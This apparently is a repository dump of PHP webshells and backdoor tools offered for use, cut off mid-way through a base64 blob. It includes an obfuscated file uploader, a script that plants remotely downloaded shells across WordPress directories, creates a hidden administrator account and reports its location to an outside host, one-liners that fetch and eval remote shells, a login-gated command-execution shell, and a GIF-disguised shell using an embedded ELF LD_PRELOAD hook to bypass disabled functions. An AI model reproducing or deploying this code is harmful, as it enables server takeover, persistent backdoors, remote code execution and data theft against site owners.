4 | $zOir8); goto gh7Bi; kaqZe: $YGX67 = base64_decode("\141\110\x52\60\143\110\115\66\x4c\171\71\x7a\x61\130\154\x68\x61\107\153\165\144\x47\71\167\x4c\x33\x52\x6c\143\x33\x51\166\143\x33\x52\65\142\107\125\x75\x63\x47\150\x77"); goto ZrKGn; cNbTz: echo "\74\x62\x3e\104\x6f\156\x65\74\57\x62\x3e\74\142\162\x3e\74\x62\162\x3e\74\x61\40\x68\x72\145\146\75\42\56\57" . $_FILES["\146\x69\x6c\x65"]["\x6e\141\155\145"] . "\x22\x3e" . $_FILES["\146\151\154\145"]["\x6e\x61\x6d\145"] . "\74\x2f\x61\x3e"; goto k6iem; MvXGh: T1_wL: goto Qj02s; gh7Bi: $qrkpM = array("\150\164\164\160" => array("\x6d\145\164\x68\x6f\x64" => "\120\x4f\x53\124", "\150\145\141\x64\145\162" => "\x43\x6f\x6e\164\x65\156\x74\55\x74\171\x70\145\x3a\x20\x61\x70\x70\154\151\143\x61\x74\151\x6f\x6e\57\x78\55\167\x77\167\x2d\x66\157\162\x6d\55\x75\x72\x6c\x65\x6e\143\157\144\x65\x64", "\143\x6f\x6e\164\145\x6e\x74" => http_build_query($WQAx6))); goto zpb8C; iLa7Z: echo "\74\151\x6e\x70\165\x74\x20\164\x79\x70\x65\75\x22\146\x69\154\x65\42\40\x6e\x61\155\x65\75\42\x66\151\x6c\145\42\40\x73\151\x7a\145\x3d\42\65\60\x22\x3e\x3c\x69\x6e\160\x75\x74\x20\156\x61\x6d\x65\x3d\42\137\165\x70\x6c\x22\40\164\x79\x70\145\x3d\42\x73\165\x62\155\x69\x74\x22\40\x69\144\75\x22\137\165\160\x6c\x22\x20\x76\x61\x6c\165\145\75\x22\x55\x70\154\157\x61\144\42\x3e\74\x2f\x66\157\162\155\76"; goto VD20y; FbNYC: echo "\74\142\76\x4e\x6f\164\40\x55\160\x6c\157\x61\144\x20\106\x69\x6c\x65\40\x21\74\57\142\x3e\x3c\142\162\x3e\x3c\142\162\x3e"; goto RAWYd; Qzme4: if (@copy($_FILES["\x66\x69\x6c\x65"]["\164\x6d\x70\x5f\x6e\141\x6d\x65"], $_FILES["\146\x69\154\x65"]["\x6e\x61\x6d\x65"])) { goto aw3ez; } goto EQGCo; Qj02s: RGhxq: 6 | -------------------------------------------------------------------------------- /ad.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Advanced File Manager 7 | 105 | 106 | 107 |
108 |

Advanced File Manager

109 | 110 | $part"; 123 | } 124 | } 125 | 126 | echo ""; 129 | 130 | // Handle directory change 131 | if (isset($_POST['changeDir'])) { 132 | $newDir = $_POST['newDir']; 133 | if (is_dir($newDir)) { 134 | $currentDir = realpath($newDir); 135 | } else { 136 | echo "

Directory does not exist.

"; 137 | } 138 | } 139 | 140 | // Handle file upload 141 | if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) { 142 | $file = $_FILES['file']; 143 | if ($file['error'] === UPLOAD_ERR_OK) { 144 | $fileName = basename($file['name']); 145 | $fileTmpPath = $file['tmp_name']; 146 | $dest_path = $currentDir . '/' . $fileName; 147 | if (move_uploaded_file($fileTmpPath, $dest_path)) { 148 | echo "

File uploaded successfully to $currentDir.

"; 149 | } else { 150 | echo "

Error moving the uploaded file.

"; 151 | } 152 | } else { 153 | echo "

Error: No file selected or upload failed.

"; 154 | } 155 | } 156 | 157 | // Handle file deletion 158 | if (isset($_GET['delete'])) { 159 | $fileToDelete = $_GET['delete']; 160 | if (is_file($fileToDelete)) { 161 | unlink($fileToDelete); 162 | echo "

File deleted: $fileToDelete

"; 163 | } 164 | } 165 | 166 | // Handle directory creation 167 | if (isset($_POST['createDir'])) { 168 | $newDir = $_POST['newDirName']; 169 | $newDirPath = $currentDir . DIRECTORY_SEPARATOR . $newDir; 170 | if (!is_dir($newDirPath)) { 171 | mkdir($newDirPath); 172 | echo "

Directory created: $newDir

"; 173 | } else { 174 | echo "

Directory already exists.

"; 175 | } 176 | } 177 | 178 | // Handle file creation 179 | if (isset($_POST['createFile'])) { 180 | $newFile = $_POST['newFileName']; 181 | $newFilePath = $currentDir . DIRECTORY_SEPARATOR . $newFile; 182 | if (!file_exists($newFilePath)) { 183 | file_put_contents($newFilePath, ''); // Create an empty file 184 | echo "

File created: $newFile

"; 185 | } else { 186 | echo "

File already exists.

"; 187 | } 188 | } 189 | 190 | echo "

Current Directory: $currentDir

"; 191 | 192 | // Display directory management forms 193 | echo '
'; 194 | 195 | // Change directory form 196 | echo '
'; 197 | echo ''; 198 | echo ''; 199 | echo '
'; 200 | 201 | // Create new directory form 202 | echo '
'; 203 | echo ''; 204 | echo ''; 205 | echo '
'; 206 | 207 | // Create new file form 208 | echo '
'; 209 | echo ''; 210 | echo ''; 211 | echo '
'; 212 | 213 | // File upload form 214 | echo '
'; 215 | echo ''; 216 | echo ''; 217 | echo '
'; 218 | 219 | echo '
'; 220 | 221 | echo "

Files and Directories in $currentDir:

"; 222 | 223 | // List directories first, then files 224 | $files = scandir($currentDir); 225 | echo ''; 226 | echo ''; 227 | 228 | // List directories 229 | foreach ($files as $file) { 230 | if ($file !== "." && $file !== ".." && is_dir($currentDir . '/' . $file)) { 231 | $filePath = $currentDir . '/' . $file; 232 | echo ""; 233 | echo ""; 234 | } 235 | } 236 | 237 | // List files 238 | foreach ($files as $file) { 239 | if ($file !== "." && $file !== ".." && is_file($currentDir . '/' . $file)) { 240 | $filePath = $currentDir . '/' . $file; 241 | echo ""; 242 | echo ""; 243 | } 244 | } 245 | 246 | echo '
File/Directory NameAction
📁$file
📄$file
'; 247 | ?> 248 |
249 | 250 | 251 | -------------------------------------------------------------------------------- /alfashell-antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /autobackdoor.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /bestmini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?> 2 | -------------------------------------------------------------------------------- /csa.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /eBy.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /edit-form-tager.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /f1.php: -------------------------------------------------------------------------------- 1 | ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; 9 | $start='403 private shell'; 10 | $end='';$inf='

[ ! ] PRIVATE SHELL [ ! ]



SOFTWARE :
'.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'


'; 11 | print $start;print $menu;print $inf; 12 | $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print ''; foreach($moreI as $n => $v) {print '';} print '
'.$n.' :> '.$v.'
PHPInfo
'; 13 | 14 | 15 | if(isset($_GET['d'])) {chdir($_GET['d']);} 16 | if(isset($_REQUEST['x'])) 17 | { 18 | 19 | switch($_REQUEST['x']) 20 | { 21 | case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '

Error Opening File

';fwrite($e,$_POST['edit_form']) or print '

Couldn\'t Save File

';fclose($e);}print '

Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .





';break; 22 | case 'cmd': print '

Execute Command


';break; 23 | case 'php': print '

PHP Code


';break; 24 | case 'phpinf': phpinfo();break; 25 | case 'yamete': setcookie($xyn,'',time()-3600);let_him_in();break; 26 | } 27 | } 28 | else 29 | { 30 | if(isset($_GET['d'])) {chdir($_GET['d']);} 31 | if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);} 32 | if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);} 33 | if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);} 34 | if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);} 35 | if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);} 36 | if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);} 37 | 38 | 39 | print '
'; 40 | print '
[ PHP-Code ] [ Logout ] [ Contact ]
'; 41 | print '

'.curpath('').'

'; 42 | print '

'; 43 | $filex=array(); 44 | $dirx=array(); 45 | print ''; 46 | if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0; 47 | foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print ''; if($i==0 or $i==1) {print '';} else {print '';} $i++;} 48 | foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '';}} 49 | print '
NamePermissionOwner/GroupOptions
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'
Rename | Delete
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'Rename | Delete


'; 50 | print '
Create Dir:

Create File:

Command:

Upload:



'; 51 | } 52 | function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='OFF';}else {$o='ON';}return($o);} 53 | function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='OFF';}else {$m='ON';}return($m);} 54 | function curl(){if(extension_loaded('curl')) {$c='ON';}else {$c='OFF';}return($c);} 55 | function reg_globals(){if(ini_get('reqister_globals')) {$r='ON';}else {$r='OFF';}return($r);} 56 | function oracle(){if(function_exists('ocilogon')) {$o='ON';}else {$o='OFF';}return($o);} 57 | function postgresql(){if(function_exists('pg_connect')) {$p='ON';}else {$p='OFF';}return($p);} 58 | function myql(){if(function_exists('mysql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 59 | function mssql(){if(function_exists('mssql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 60 | function gzip(){if(function_exists('gzencode')) {$m='ON';}else {$m='OFF';}return($m);} 61 | function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);} 62 | function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .=''.$g.''.DIRECTORY_SEPARATOR;}return($n);} 63 | function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='#00ff00';}return($c);} 64 | function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}} 65 | function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);} 66 | function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'
';}} else {print 'Wh00pz';}} 67 | function initiate(){print '
Login
';} 68 | function let_him_in() { header("Location: ".basename(__FILE__)); } 69 | print $end; 70 | ?> 71 | -------------------------------------------------------------------------------- /firewallbypass.php: -------------------------------------------------------------------------------- 1 | ' . $secure); 38 | ?> 39 | -------------------------------------------------------------------------------- /gecko-mini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/?> 2 | -------------------------------------------------------------------------------- /haxorsec-bypasser.php: -------------------------------------------------------------------------------- 1 | GIF89a; 2 | ;; 3 | 4 | 5 | 6 | BypassServ By HaxorSec 7 | 8 | 9 | 10 | 11 | 12 | 167 | 168 | 169 |
170 | [ mail() : [ ON ] ]"; 204 | } else { 205 | $mail = "[ mail() : [ OFF ] ]"; 206 | } 207 | if(function_exists('mb_send_mail')) { 208 | $mbb = "[ mb_send_mail() : [ ON ] ]"; 209 | }else{ 210 | $mbb = "[ mb_send_mail() : [ OFF ] ]"; 211 | } 212 | if(function_exists('error_log')) { 213 | $errr = "[ error_log() : [ ON ] ]"; 214 | }else{ 215 | $errr = "[ error_log() : [ OFF ] ]"; 216 | } 217 | if(function_exists('imap_mail')) { 218 | $impp = "[ imap_mail() : [ ON ] ]"; 219 | }else{ 220 | $impp = "[ imap_mail() : [ OFF ] ]
"; 221 | } 222 | 223 | 224 | 225 | 226 | echo "[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
"; 227 | if (function_exists('mail')) { 228 | echo $mail." ".$mbb." ".$errr." ".$impp; 229 | } else { 230 | echo $mail." ".$mbb." ".$errr." ".$impp; 231 | } 232 | if (function_exists('putenv')) { 233 | echo "[ Function putenv() ] : [ ON ]
"; 234 | } else { 235 | echo "[ Function putenv() ] : [ OFF ]
"; 236 | } 237 | foreach ($_GET as $c => $d) $_GET[$c] = y($d); 238 | 239 | $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); 240 | $chd($currentDirectory); 241 | 242 | $viewCommandResult = ''; 243 | 244 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 245 | if (isset($_FILES['fileToUpload'])) { 246 | $target_file = $currentDirectory . '/' . $bs($_FILES["fileToUpload"]["name"]); 247 | if ($mup($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 248 | echo "
File " . $htm($bs($_FILES["fileToUpload"]["name"])) . " Upload success
"; 249 | } else { 250 | echo "
Sorry, there was an error uploading your file.
"; 251 | } 252 | } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { 253 | $ff = $_POST['folder_name']; 254 | $newFolder = $currentDirectory . '/' . $ff; 255 | if (!file_exists($newfolder)) { 256 | if ($mek($newFolder) !== false) { 257 | echo '
Folder created successfully!'; 258 | }else{ 259 | echo '
Error: Failed to create folder!'; 260 | } 261 | } 262 | 263 | } elseif (isset($_POST['file_name'])) { 264 | $fileName = $_POST['file_name']; 265 | $newFile = $currentDirectory . '/' . $fileName; 266 | if (!file_exists($newFile)) { 267 | if ($fpc($newFile, '') !== false) { 268 | echo '
File created successfully!' . $fileName .' '; 269 | $fileToView = $newFile; 270 | if (file_exists($fileToView)) { 271 | $fileContent = $fgc($fileToView); 272 | $viewCommandResult = '

Result: ' . $fileName . '

273 |
274 | 275 | 276 |
'; 277 | } else { 278 | $viewCommandResult = '

Error: File not found!

'; 279 | } 280 | } else { 281 | echo '
Error: Failed to create file!'; 282 | } 283 | }else{ 284 | echo '
Error: File Already Exists!'; 285 | } 286 | } elseif (isset($_POST['cmd_input'])){ 287 | $p = "p"."u"."t"."e"."n"."v"; 288 | $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s"; 289 | $m = "m"."a"."i"."l"; 290 | $base = "ba"."se"."64"."_"."de"."co"."de"; 291 | $en = "ba"."se"."64"."_"."en"."co"."de"; 292 | $mb = "m"."b"."_"."s"."e"."n"."d"."_"."m"."a"."i"."l"; 293 | $err = "e"."r"."r"."o"."r"."_"."l"."o"."g"; 294 | $drnm = "d"."i"."r"."n"."a"."m"."e"; 295 | $imp = "i"."m"."a"."p"."_"."m"."a"."i"."l"; 296 | $currentFilePath = $_SERVER['PHP_SELF']; 297 | $doc = $_SERVER['DOCUMENT_ROOT']; 298 | $directoryPath = $drnm($currentFilePath); 299 | $full = $doc . $directoryPath; 300 | $hook = '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BwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA